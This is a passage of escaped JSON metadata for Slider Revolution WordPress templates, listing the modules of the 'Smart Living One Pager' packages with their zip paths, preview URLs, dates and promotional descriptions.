1\",\"alias\":\"services1\",\"zip\":\"packs\\/services1.zip\",\"uid\":\"08f72a81aeb9afdaa57f544e4331a6da\",\"img\":\"services1\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/smart-living-one-page-template-for-wordpress-v1\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=smart-living-one-page-template-for-wordpress-v1\",\"version\":\"1.0.0\",\"required\":\"6.5.8\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">Never build a one pager from scratch again!<br>\\r\\nSlider Revolution for WordPress is a modular, fully visual content builder, that allows you to create pro-level one-pagers like this one in no time.<br>\\r\\n20 different \\\"Smart Living\\\" modules are included and come in 3 example page setups!<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Revolution Base\",\"filter\":[\"hero\"],\"plugin_require\":null,\"date\":\"2021-09-07 14:52:41\",\"package\":\"Smart Living One Pager V1\",\"package_order\":\"3\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"48\",\"installed\":false},\"531\":{\"id\":\"576\",\"title\":\"Projects 1\",\"alias\":\"projects1\",\"zip\":\"packs\\/projects1.zip\",\"uid\":\"11ff60e82fcf47a6a2c6bdce3cc1d8f2\",\"img\":\"projects1\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/smart-living-one-page-template-for-wordpress-v1\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=smart-living-one-page-template-for-wordpress-v1\",\"version\":\"1.0.0\",\"required\":\"6.5.8\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">Never build a one pager from scratch again!<br>\\r\\nSlider Revolution for WordPress is a modular, fully visual content builder, that allows you to create pro-level one-pagers like this one in no time.<br>\\r\\n20 different \\\"Smart Living\\\" modules are included and come in 3 example page setups!<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Slider Package\",\"filter\":[\"slider\"],\"plugin_require\":null,\"date\":\"2021-09-07 15:01:48\",\"package\":\"Smart Living One Pager V1\",\"package_order\":\"4\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"48\",\"installed\":false},\"532\":{\"id\":\"577\",\"title\":\"Footer 1\",\"alias\":\"footer-1\",\"zip\":\"packs\\/footer-1.zip\",\"uid\":\"947fac99689a985c7f0f7dfec4311f6b\",\"img\":\"footer-1\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/smart-living-one-page-template-for-wordpress-v1\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=smart-living-one-page-template-for-wordpress-v1\",\"version\":\"1.0.0\",\"required\":\"6.5.8\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">Never build a one pager from scratch again!<br>\\r\\nSlider Revolution for WordPress is a modular, fully visual content builder, that allows you to create pro-level one-pagers like this one in no time.<br>\\r\\n20 different \\\"Smart Living\\\" modules are included and come in 3 example page setups!<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Slider Package\",\"filter\":[\"hero\"],\"plugin_require\":null,\"date\":\"2021-09-07 15:05:00\",\"package\":\"Smart Living One Pager V1\",\"package_order\":\"5\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"48\",\"installed\":false},\"533\":{\"id\":\"578\",\"title\":\"Explainer Block 1 Part 1\",\"alias\":\"explainer-block-1-part1\",\"zip\":\"packs\\/explainer-block-1-part1.zip\",\"uid\":\"731980bef0ea06263d05b286b5a75dfe\",\"img\":\"explainer-block-1-part1\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/smart-living-one-page-template-for-wordpress-v1\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=smart-living-one-page-template-for-wordpress-v1\",\"version\":\"1.0.0\",\"required\":\"6.5.8\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">An elegant slider for your website. Flexible and customizable.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">Never build a one pager from scratch again!<br>\\r\\nSlider Revolution for WordPress is a modular, fully visual content builder, that allows you to create pro-level one-pagers like this one in no time.<br>\\r\\n20 different \\\"Smart Living\\\" modules are included and come in 3 example page setups!<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Slider Package\",\"filter\":[\"hero\"],\"plugin_require\":null,\"date\":\"2021-09-07 15:06:07\",\"package\":\"Smart Living One Pager V1\",\"package_order\":\"6\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"48\",\"installed\":false},\"534\":{\"id\":\"579\",\"title\":\"Explainer Block 1 Part 2\",\"alias\":\"explainer-block-1-part2\",\"zip\":\"packs\\/explainer-block-1-part2.zip\",\"uid\":\"ded730f13551f78b9a87b159b72d8ce8\",\"img\":\"explainer-block-1-part2\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/smart-living-one-page-template-for-wordpress-v1\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=smart-living-one-page-template-for-wordpress-v1\",\"version\":\"1.0.0\",\"required\":\"6.5.8\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">An elegant slider for your website. Flexible and customizable.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">Never build a one pager from scratch again!<br>\\r\\nSlider Revolution for WordPress is a modular, fully visual content builder, that allows you to create pro-level one-pagers like this one in no time.<br>\\r\\n20 different \\\"Smart Living\\\" modules are included and come in 3 example page setups!<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Slider Package\",\"filter\":[\"hero\"],\"plugin_require\":null,\"date\":\"2021-09-07 15:07:26\",\"package\":\"Smart Living One Pager V1\",\"package_order\":\"7\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"48\",\"installed\":false},\"535\":{\"id\":\"580\",\"title\":\"Projects Modal 1\",\"alias\":\"projects-modal-1\",\"zip\":\"packs\\/projects-modal-1.zip\",\"uid\":\"b17af2f4e21786711a2ce4ac0c4436ad\",\"img\":\"projects-modal-1\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/smart-living-one-page-template-for-wordpress-v1\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=smart-living-one-page-template-for-wordpress-v1\",\"version\":\"1.0.0\",\"required\":\"6.5.8\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">Never build a one pager from scratch again!<br>\\r\\nSlider Revolution for WordPress is a modular, fully visual content builder, that allows you to create pro-level one-pagers like this one in no time.<br>\\r\\n20 different \\\"Smart Living\\\" modules are included and come in 3 example page setups!<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Slider Package\",\"filter\":[\"slider\"],\"plugin_require\":null,\"date\":\"2021-09-07 15:08:26\",\"package\":\"Smart Living One Pager V1\",\"package_order\":\"8\",\"package_parent\":\"\",\"modal\":\"1\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"48\",\"installed\":false},\"536\":{\"id\":\"581\",\"title\":\"Menu 2\",\"alias\":\"menu-2\",\"zip\":\"packs\\/menu-2.zip\",\"uid\":\"a8d103f753ee50d4f81aa4100df8b7f9\",\"img\":\"menu-2\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/smart-living-one-page-template-for-wordpress-v2\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=smart-living-one-page-template-for-wordpress-v2\",\"version\":\"1.0.0\",\"required\":\"6.5.8\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">Never build a one pager from scratch again!<br>\\r\\nSlider Revolution for WordPress is a modular, fully visual content builder, that allows you to create pro-level one-pagers like this one in no time.<br>\\r\\n20 different \\\"Smart Living\\\" modules are included and come in 3 example page setups!<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Slider Package\",\"filter\":[\"hero\"],\"plugin_require\":null,\"date\":\"2021-09-07 15:20:20\",\"package\":\"Smart Living One Pager V2\",\"package_order\":\"0\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"49\",\"installed\":false},\"537\":{\"id\":\"582\",\"title\":\"Hero 2\",\"alias\":\"hero-2\",\"zip\":\"packs\\/hero-2.zip\",\"uid\":\"7e56900f8c4b6e12435b70e141accaa8\",\"img\":\"hero-2\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/smart-living-one-page-template-for-wordpress-v2\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=smart-living-one-page-template-for-wordpress-v2\",\"version\":\"1.0.0\",\"required\":\"6.5.8\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">Never build a one pager from scratch again!<br>\\r\\nSlider Revolution for WordPress is a modular, fully visual content builder, that allows you to create pro-level one-pagers like this one in no time.<br>\\r\\n20 different \\\"Smart Living\\\" modules are included and come in 3 example page setups!<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Slider Package\",\"filter\":[\"hero\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-transitionpack-addon\\\\\\/revslider-transitionpack-addon.php\\\",\\\"name\\\":\\\"Advanced Transitions AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"2021-09-07 15:27:59\",\"package\":\"Smart Living One Pager V2\",\"package_order\":\"1\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"49\",\"installed\":false},\"538\":{\"id\":\"583\",\"title\":\"Services 2\",\"alias\":\"services-2\",\"zip\":\"packs\\/services-2.zip\",\"uid\":\"da2d588b291a7754096ac77746ba1da5\",\"img\":\"services-2\\/services2-thumbnail.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/smart-living-one-page-template-for-wordpress-v2\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=smart-living-one-page-template-for-wordpress-v2\",\"version\":\"1.0.0\",\"required\":\"6.5.8\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">Never build a one pager from scratch again!<br>\\r\\nSlider Revolution for WordPress is a modular, fully visual content builder, that allows you to create pro-level one-pagers like this one in no time.<br>\\r\\n20 different \\\"Smart Living\\\" modules are included and come in 3 example page setups!<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Slider Package\",\"filter\":[\"hero\"],\"plugin_require\":null,\"date\":\"2021-09-07 15:29:09\",\"package\":\"Smart Living One Pager V2\",\"package_order\":\"2\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"49\",\"installed\":false},\"539\":{\"id\":\"584\",\"title\":\"About 2\",\"alias\":\"about-2\",\"zip\":\"packs\\/about-2.zip\",\"uid\":\"8e9e84d1aec08de6e099473683bf0e57\",\"img\":\"about-2\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/smart-living-one-page-template-for-wordpress-v2\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=smart-living-one-page-template-for-wordpress-v2\",\"version\":\"1.0.0\",\"required\":\"6.5.8\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">Never build a one pager from scratch again!<br>\\r\\nSlider Revolution for WordPress is a modular, fully visual content builder, that allows you to create pro-level one-pagers like this one in no time.<br>\\r\\n20 different \\\"Smart Living\\\" modules are included and come in 3 example page setups!<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Slider Package\",\"filter\":[\"hero\"],\"plugin_require\":null,\"date\":\"2021-09-07 15:30:15\",\"package\":\"Smart Living One Pager V2\",\"package_order\":\"3\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"49\",\"installed\":false},\"540\":{\"id\":\"585\",\"title\":\"Projects 2\",\"alias\":\"projects-2\",\"zip\":\"packs\\/projects-2.zip\",\"uid\":\"99bc6ca75f6d5e018701aef5f5b22b27\",\"img\":\"projects-2\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/smart-living-one-page-template-for-wordpress-v2\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=smart-living-one-page-template-for-wordpress-v2\",\"version\":\"1.0.0\",\"required\":\"6.5.8\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">Never build a one pager from scratch again!<br>\\r\\nSlider Revolution for WordPress is a modular, fully visual content builder, that allows you to create pro-level one-pagers like this one in no time.<br>\\r\\n20 different \\\"Smart Living\\\" modules are included and come in 3 example page setups!<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Slider Package\",\"filter\":[\"slider\"],\"plugin_require\":null,\"date\":\"2021-09-07 15:32:06\",\"package\":\"Smart Living One Pager V2\",\"package_order\":\"4\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"49\",\"installed\":false},\"541\":{\"id\":\"586\",\"title\":\"Footer 2\",\"alias\":\"footer2\",\"zip\":\"packs\\/footer2.zip\",\"uid\":\"99df496d2fd9e897a2debb66958cb610\",\"img\":\"footer2\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/smart-living-one-page-template-for-wordpress-v2\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=smart-living-one-page-template-for-wordpress-v2\",\"version\":\"1.0.0\",\"required\":\"6.5.8\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">Never build a one pager from scratch again!<br>\\r\\nSlider Revolution for WordPress is a modular, fully visual content builder, that allows you to create pro-level one-pagers like this one in no time.<br>\\r\\n20 different \\\"Smart Living\\\" modules are included and come in 3 example page setups!<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Slider Package\",\"filter\":[\"hero\"],\"plugin_require\":null,\"date\":\"2021-09-07 15:34:09\",\"package\":\"Smart Living One Pager V2\",\"package_order\":\"5\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"49\",\"installed\":false},\"542\":{\"id\":\"587\",\"title\":\"Explainer Block 2 Part 1\",\"alias\":\"explainer-block-2-part1\",\"zip\":\"packs\\/explainer-block-2-part1.zip\",\"uid\":\"aee4d41e9cf5f91ad69bfbe96d1dc1b8\",\"img\":\"explainer-block-2-part1\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/smart-living-one-page-template-for-wordpress-v2\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=smart-living-one-page-template-for-wordpress-v2\",\"version\":\"1.0.0\",\"required\":\"6.5.8\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">Never build a one pager from scratch again!<br>\\r\\nSlider Revolution for WordPress is a modular, fully visual content builder, that allows you to create pro-level one-pagers like this one in no time.<br>\\r\\n20 different \\\"Smart Living\\\" modules are included and come in 3 example page setups!<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Slider Package\",\"filter\":[\"hero\"],\"plugin_require\":null,\"date\":\"2021-09-07 15:35:48\",\"package\":\"Smart Living One Pager V2\",\"package_order\":\"6\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"49\",\"installed\":false},\"543\":{\"id\":\"588\",\"title\":\"Explainer Block 2 Part 2\",\"alias\":\"explainer-block-2-part2\",\"zip\":\"packs\\/explainer-block-2-part2.zip\",\"uid\":\"b12ac82484c5d2609994978f95026057\",\"img\":\"explainer-block-2-part2\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/smart-living-one-page-template-for-wordpress-v2\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=smart-living-one-page-template-for-wordpress-v2\",\"version\":\"1.0.0\",\"required\":\"6.5.8\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">Never build a one pager from scratch again!<br>\\r\\nSlider Revolution for WordPress is a modular, fully visual content builder, that allows you to create pro-level one-pagers like this one in no time.<br>\\r\\n20 different \\\"Smart Living\\\" modules are included and come in 3 example page setups!<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Slider Package\",\"filter\":[\"hero\"],\"plugin_require\":null,\"date\":\"2021-09-07 15:37:05\",\"package\":\"Smart Living One Pager V2\",\"package_order\":\"7\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"49\",\"installed\":false},\"544\":{\"id\":\"589\",\"title\":\"Projects Modal 2\",\"alias\":\"projects-modal-2\",\"zip\":\"packs\\/projects-modal-2.zip\",\"uid\":\"ac164d7043a8958ae2931e4be54bf56e\",\"img\":\"projects-modal-2\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/smart-living-one-page-template-for-wordpress-v2\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=smart-living-one-page-template-for-wordpress-v2\",\"version\":\"1.0.0\",\"required\":\"6.5.8\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">Never build a one pager from scratch again!<br>\\r\\nSlider Revolution for WordPress is a modular, fully visual content builder, that allows you to create pro-level one-pagers like this one in no time.<br>\\r\\n20 different \\\"Smart Living\\\" modules are included and come in 3 example page setups!<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Slider Package\",\"filter\":[\"slider\"],\"plugin_require\":null,\"date\":\"2021-09-07 15:38:22\",\"package\":\"Smart Living One Pager V2\",\"package_order\":\"8\",\"package_parent\":\"\",\"modal\":\"1\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"49\",\"installed\":false},\"545\":{\"id\":\"590\",\"title\":\"Menu 3\",\"alias\":\"menu-3\",\"zip\":\"packs\\/menu-3.zip\",\"uid\":\"7300529d564642c76e61890cf0ef57cf\",\"img\":\"menu-3\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/smart-living-one-page-template-for-wordpress-v3\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=smart-living-one-page-template-for-wordpress-v3\",\"version\":\"1.0.0\",\"required\":\"6.5.8\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">Never build a one pager from scratch again!<br>\\r\\nSlider Revolution for WordPress is a modular, fully visual content builder, that allows you to create pro-level one-pagers like this one in no time.<br>\\r\\n20 different \\\"Smart Living\\\" modules are included and come in 3 example page setups!<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Slider Package\",\"filter\":[\"hero\"],\"plugin_require\":null,\"date\":\"2021-09-07 15:42:03\",\"package\":\"Smart Living One Pager V3\",\"package_order\":\"0\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"50\",\"installed\":false},\"546\":{\"id\":\"591\",\"title\":\"Hero 3\",\"alias\":\"hero-3\",\"zip\":\"packs\\/hero-3.zip\",\"uid\":\"08db05794abf4e6c10788cbd423f92b2\",\"img\":\"hero-3\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/smart-living-one-page-template-for-wordpress-v3\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=smart-living-one-page-template-for-wordpress-v3\",\"version\":\"1.0.0\",\"required\":\"6.5.8\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">Never build a one pager from scratch again!<br>\\r\\nSlider Revolution for WordPress is a modular, fully visual content builder, that allows you to create pro-level one-pagers like this one in no time.<br>\\r\\n20 different \\\"Smart Living\\\" modules are included and come in 3 example page setups!<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Slider Package\",\"filter\":[\"slider\"],\"plugin_require\":null,\"date\":\"2021-09-07 15:46:06\",\"package\":\"Smart Living One Pager V3\",\"package_order\":\"1\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"50\",\"installed\":false},\"547\":{\"id\":\"592\",\"title\":\"About 3\",\"alias\":\"about-3\",\"zip\":\"packs\\/about-3.zip\",\"uid\":\"dac01fc9b9d664f271e1ea6a1bbb850c\",\"img\":\"about-3\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/smart-living-one-page-template-for-wordpress-v3\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=smart-living-one-page-template-for-wordpress-v3\",\"version\":\"1.0.0\",\"required\":\"6.5.8\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">Never build a one pager from scratch again!<br>\\r\\nSlider Revolution for WordPress is a modular, fully visual content builder, that allows you to create pro-level one-pagers like this one in no time.<br>\\r\\n20 different \\\"Smart Living\\\" modules are included and come in 3 example page setups!<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Slider Package\",\"filter\":[\"hero\"],\"plugin_require\":null,\"date\":\"2021-09-07 15:47:44\",\"package\":\"Smart Living One Pager V3\",\"package_order\":\"2\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"50\",\"installed\":false},\"548\":{\"id\":\"593\",\"title\":\"Services 3\",\"alias\":\"services-3\",\"zip\":\"packs\\/services-3.zip\",\"uid\":\"4bad1c4a765cef7d93d3c7e2a0e76b83\",\"img\":\"services-3\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/smart-living-one-page-template-for-wordpress-v3\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=smart-living-one-page-template-for-wordpress-v3\",\"version\":\"1.0.0\",\"required\":\"6.5.8\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">Never build a one pager from scratch again!<br>\\r\\nSlider Revolution for WordPress is a modular, fully visual content builder, that allows you to create pro-level one-pagers like this one in no time.<br>\\r\\n20 different \\\"Smart Living\\\" modules are included and come in 3 example page setups!<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Slider Package\",\"filter\":[\"hero\"],\"plugin_require\":null,\"date\":\"2021-09-07 15:50:03\",\"package\":\"Smart Living One Pager V3\",\"package_order\":\"3\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"50\",\"installed\":false},\"549\":{\"id\":\"594\",\"title\":\"Projects 3\",\"alias\":\"projects-3\",\"zip\":\"packs\\/projects-3.zip\",\"uid\":\"e3337a84122e580679474dea8d7bf37c\",\"img\":\"projects-3\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/smart-living-one-page-template-for-wordpress-v3\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=smart-living-one-page-template-for-wordpress-v3\",\"version\":\"1.0.0\",\"required\":\"6.5.8\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">Never build a one pager from scratch again!<br>\\r\\nSlider Revolution for WordPress is a modular, fully visual content builder, that allows you to create pro-level one-pagers like this one in no time.<br>\\r\\n20 different \\\"Smart Living\\\" modules are included and come in 3 example page setups!<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Slider Package\",\"filter\":[\"slider\"],\"plugin_require\":null,\"date\":\"2021-09-07 15:51:31\",\"package\":\"Smart Living One Pager V3\",\"package_order\":\"4\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"50\",\"installed\":false},\"550\":{\"id\":\"595\",\"title\":\"Footer 3\",\"alias\":\"footer-3\",\"zip\":\"packs\\/footer-3.zip\",\"uid\":\"524f4445a5565bf3ef1dcd7b2f0228cc\",\"img\":\"footer-3\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/smart-living-one-page-template-for-wordpress-v3\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=smart-living-one-page-template-for-wordpress-v3\",\"version\":\"1.0.0\",\"required\":\"6.5.8\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">Never build a one pager from scratch again!<br>\\r\\nSlider Revolution for WordPress is a modular, fully visual content builder, that allows you to create pro-level one-pagers like this one in no time.<br>\\r\\n20 different \\\"Smart Living\\\" modules are included and come in 3 example page setups!<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Slider Package\",\"filter\":[\"hero\"],\"plugin_require\":null,\"date\":\"2021-09-07 15:53:03\",\"package\":\"Smart Living One Pager V3\",\"package_order\":\"5\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"50\",\"installed\":false},\"551\":{\"id\":\"596\",\"title\":\"Explainer Block 3 Part 1\",\"alias\":\"explainer-block-3-part1\",\"zip\":\"packs\\/explainer-block-3-part1.zip\",\"uid\":\"b1469a955fecb4e1d645a604804716de\",\"img\":\"explainer-block-3-part1\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/smart-living-one-page-template-for-wordpress-v3\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=smart-living-one-page-template-for-wordpress-v3\",\"version\":\"1.0.0\",\"required\":\"6.5.8\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">Never build a one pager from scratch again!<br>\\r\\nSlider Revolution for WordPress is a modular, fully visual content builder, that allows you to create pro-level one-pagers like this one in no time.<br>\\r\\n20 different \\\"Smart Living\\\" modules are included and come in 3 example page setups!<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Slider Package\",\"filter\":[\"hero\"],\"plugin_require\":null,\"date\":\"2021-09-07 15:54:20\",\"package\":\"Smart Living One Pager V3\",\"package_order\":\"6\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"50\",\"installed\":false},\"552\":{\"id\":\"597\",\"title\":\"Explainer Block 3 Part 2\",\"alias\":\"explainer-block-3-part2\",\"zip\":\"packs\\/explainer-block-3-part2.zip\",\"uid\":\"3faa6f1dc248ef2ba3d50cc60db557b1\",\"img\":\"explainer-block-3-part2\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/smart-living-one-page-template-for-wordpress-v3\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=smart-living-one-page-template-for-wordpress-v3\",\"version\":\"1.0.0\",\"required\":\"6.5.8\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">Never build a one pager from scratch again!<br>\\r\\nSlider Revolution for WordPress is a modular, fully visual content builder, that allows you to create pro-level one-pagers like this one in no time.<br>\\r\\n20 different \\\"Smart Living\\\" modules are included and come in 3 example page setups!<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Slider Package\",\"filter\":[\"hero\"],\"plugin_require\":null,\"date\":\"2021-09-07 15:55:33\",\"package\":\"Smart Living One Pager 